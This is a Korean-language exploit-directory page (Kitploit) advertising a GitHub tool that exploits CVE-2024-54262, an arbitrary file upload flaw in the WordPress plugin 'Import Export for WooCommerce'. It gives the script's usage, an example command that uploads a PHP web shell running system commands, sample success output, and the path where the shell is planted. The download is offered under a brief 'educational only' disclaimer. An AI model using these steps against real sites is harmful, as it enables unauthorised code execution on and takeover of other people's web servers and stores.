Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-54262 — CVE-2024-54262 익스플로잇: WooCommerce용 Import Export의 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-54262
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

CVE-2024-54262 익스플로잇: WooCommerce용 Import Export의 임의 파일 업로드

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-54262

CVE-2024-54262 익스플로잇: Import Export for WooCommerce의 임의 파일 업로드

개요

이 스크립트는 WordPress 플러그인 "Import Export for WooCommerce"의 취약점을 악용합니다. 이 취약점은 인증되지 않은 사용자가 임의의 파일을 업로드하여 잠재적인 원격 코드 실행(RCE)으로 이어질 수 있게 합니다.

기능:

  • 버전 탐지: WordPress 사이트가 취약한 플러그인 버전을 실행 중인지 자동으로 확인합니다.
  • 인증: 추가 악용을 위한 WordPress 로그인을 지원합니다.
  • 파일 업로드: RCE를 위한 악성 PHP 파일 업로드를 허용합니다.

사전 요구 사항:

  1. Python 3.x
  2. 필수 Python 라이브러리:
    • requests
    • argparse

다음 명령으로 의존성을 설치하세요:

root@kitploit:~
pip install requests

3.대상 WordPress 사이트가 취약한 버전의 플러그인을 사용 중인지 확인하세요.

사용법:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

예시:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

출력 설명

  1. 사이트가 취약합니다.
    • WordPress 사이트가 취약한 플러그인 버전을 실행 중임을 나타냅니다.
  2. 로그인에 성공했습니다.
    • 제공된 자격 증명으로 로그인에 성공했음을 확인합니다.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • 셸 이름: import_manual_1737090262.php
  • 셸 경로: wp-content/uploads/import-export-for-woocommerce/product/

면책 조항

이 도구는 교육 목적으로만 제공됩니다. 작성자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 명시적 허가 없이 시스템에 무단으로 접근하거나 악용하는 것은 불법적이며 비윤리적입니다.

도구 다운로드